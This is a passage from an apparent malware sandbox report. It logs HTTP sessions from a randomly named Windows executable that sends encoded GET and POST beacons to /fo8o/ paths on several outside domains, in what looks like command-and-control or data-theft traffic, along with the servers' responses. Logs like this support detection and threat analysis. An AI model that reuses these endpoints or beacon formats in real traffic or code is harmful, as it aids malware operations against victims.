66 49 41 70 65 36 48 55 70 55 41 63 4d 31 36 75 46 6c 64 69 56 59 48 46 55 53 37 6f 53 7a 2b 68 76 4b 7a 45 52 67 61 55 4a 39 7a 62 56 6a 45 75 5a 36 38 74 46 5a 6b 69 64 4e 5a 38 48 42 39 4f 77 4a 42 65 63 73 59 46 52 70 76 59 39 31 7a 4d 42 44 58 69 53 72 68 52 42 79 54 77 75 58 6a 73 67 33 64 71 2f 77 7a 4f 7a 36 46 43 35 54 51 39 32 41 42 45 54 43 47 65 2b 72 79 7a 57 4f 2f 59 2f 41 70 37 54 6d 57 4a 41 33 72 69 55 78 52 63 32 58 69 6f 76 71 69 39 37 31 5a 41 56 46 45 74 34 72 36 71 6c 41 2f 6b 51 66 4b 66 66 43 66 63 46 5a 55 4d 6e 43 52 32 79 65 70 53 6a 59 55 39 2f 36 79 4f 58 31 47 43 41 71 47 43 4e 42 56 58 5a 4d 78 4d 4c 59 77 69 6b 46 54 6c 30 54 42 35 76 35 48 39 35 36 6c 5a 56 62 6e 65 44 4f 61 45 64 76 58 62 74 34 6c 6d 73 32 75 33 75 38 30 78 41 58 6f 69 73 59 69 56 2b 57 39 62 56 75 45 53 59 68 57 79 33 37 32 4f 4f 6e 6c 66 4c 65 54 68 72 79 49 66 32 63 44 36 62 46 6b 38 58 6e 34 4c 4f 6e 74 4f 53 62 77 32 76 39 4f 4e 34 46 6e 6d 55 70 6f 30 58 44 33 56 64 46 55 78 73 42 6a 4d 64 4a 7a 41 43 6e 4f 76 34 73 66 6d 6c 70 6b 2f 44 31 4b 34 46 39 6f 45 69 32 4a 4c 2f 79 78 4c 41 6e 38 6f 3d Data Ascii: OVFPBtpp=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/lrd8D+jG8OowuxFd2GoH0N7VBOpyOjU5T7aW8GHcTTcKPdVpqdTp93GNF7JE00ot5PQkW0ErDgpb2E+co1V9gToq9hIm6aiKkUUWVU/H97BUyw9tEt9TVmMlWjWNzXICM9hRFQhAMWk0W2BHoKMSmFgWxYijqW7z77ZmpxNSjIu7OGVcDcWsjUGcXezRh9NBL1L1Xx9IKUlb4Dw367IijJKiXvzszhZNtTSnoq9zIVRxF+mH0qOacx7KqP6XMArI00Rk+XW43WzKFSGJcg34Ug6XCttvOpYHDs2LgqPSxA4udmxAnzbTYJZfcIAsFH5RRH1G91uuA7xVssKePfPt5D/p8or1ojF02/cgD4sFpbSKJAeoVQqmCpPcmTFGrYk8bMXi6NONGo0pFJeIb7LfvqyzzezR78iUGbKriLN/lhtw2Oqzl7bEn9Isuxo+bJNhPX3n4UdlNu/4FM0H9GvYQgCkeJmW4iRXjJIDiX9qm7d+uHnWtMuxaXXXWJfQCUOwT+jZp/urzdJ5/X+PwQP/I7yvjPirM3Qu/JwGsEOTmlk4kDRvr6L7mA+OcjV7u6zLQZO+7RV/EzJlidoYx3xmtlihQZ1P+DBR8IaNVoBN+XUI15Z6vDJr8W6xEi9FbcoH1LM64m9yfd7C+5YeMnfoDGKGY3AFyXbsdg19u1RvXyARX11vj2w4XFq1BBfyaQf5HijsihG1ASXPTfRn2b5OKg9ASHxarG1K60m1qcYfwM/nBD9TqJyUHz6QD9uMBLYAFlTj5pQzl0Ub6FDGVic4Obx1hp7/cxeltGR97TF19fIApe6HUpUAcM16uFldiVYHFUS7oSz+hvKzERgaUJ9zbVjEuZ68tFZkidNZ8HB9OwJBecsYFRpvY91zMBDXiSrhRByTwuXjsg3dq/wzOz6FC5TQ92ABETCGe+ryzWO/Y/Ap7TmWJA3riUxRc2Xiovqi971ZAVFEt4r6qlA/kQfKffCfcFZUMnCR2yepSjYU9/6yOX1GCAqGCNBVXZMxMLYwikFTl0TB5v5H956lZVbneDOaEdvXbt4lms2u3u80xAXoisYiV+W9bVuESYhWy372OOnlfLeThryIf2cD6bFk8Xn4LOntOSbw2v9ON4FnmUpo0XD3VdFUxsBjMdJzACnOv4sfmlpk/D1K4F9oEi2JL/yxLAn8o=
Apr 26, 2024 10:09:21.723572016 CEST	728	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.2 Date: Fri, 26 Apr 2024 08:09:21 GMT Content-Type: text/html Content-Length: 559 Via: 1.1 google Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.9	49746	34.111.148.214	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:24.075879097 CEST	504	OUT	GET /fo8o/?OVFPBtpp=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/D+TcC9TMB/RoFCEllCpPhJWUqMeQ==&-LXd8=qhq0rNepS HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.660danm.top Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Apr 26, 2024 10:09:24.405823946 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Fri, 26 Apr 2024 08:09:24 GMT Content-Type: text/html Content-Length: 5161 Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT Vary: Accept-Encoding ETag: "65a4939c-1429" Cache-Control: no-cache Accept-Ranges: bytes Via: 1.1 google Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 34 32 2e 31 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e7 99 be e5 ba a6 e7 bb 9f e8 ae a1 22 2c 74 29 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function ba
Apr 26, 2024 10:09:24.405850887 CEST	1289	IN	Data Raw: 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb Data Ascii: iduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n)
Apr 26, 2024 10:09:24.405864954 CEST	1289	IN	Data Raw: 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29 29 3b 76 61 72 20 63 Data Ascii: .push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(e()\|\|r())&&"
Apr 26, 2024 10:09:24.405878067 CEST	241	IN	Data Raw: 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 24 73 63 72 69 70 74 31 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 24 73 63 72 69 70 74 31 2e 73 65 Data Ascii: ElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($script1,$
Apr 26, 2024 10:09:24.414762020 CEST	1289	IN	Data Raw: 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
Apr 26, 2024 10:09:24.414777994 CEST	64	IN	Data Raw: 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38 33 35 66 34 61 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: ic/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.9	49747	217.196.55.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:29.920550108 CEST	780	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 197 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 30 2b 6a 75 71 78 72 4b 66 65 4a 78 78 35 45 69 47 4c 51 32 64 33 7a 48 6a 6f Data Ascii: OVFPBtpp=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv90+juqxrKfeJxx5EiGLQ2d3zHjo
Apr 26, 2024 10:09:30.097098112 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 26 Apr 2024 08:09:30 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.9	49748	217.196.55.202	80	824	C:\Program Files (x86)\LUpEpNstrNffBeNYFcbfFVhZpuWxeFRvbSQkVbtmUHMryQmCSEsxQ\ZzbhPSZTdqrAcRrzRCcDatTxZKV.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 10:09:32.627994061 CEST	804	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 4f 56 46 50 42 74 70 70 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 64 51 30 67 71 41 64 71 62 39 2b 4b 48 66 33 44 58 43 6c 46 4f 33 44 75 31 54 4f 67 3d 3d Data Ascii: OVFPBtpp=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQ0gqAdqb9+KHf3DXClFO3Du1TOg==
Apr 26, 2024 10:09:32.804269075 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Fri, 26 Apr 2024 08:09:32 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 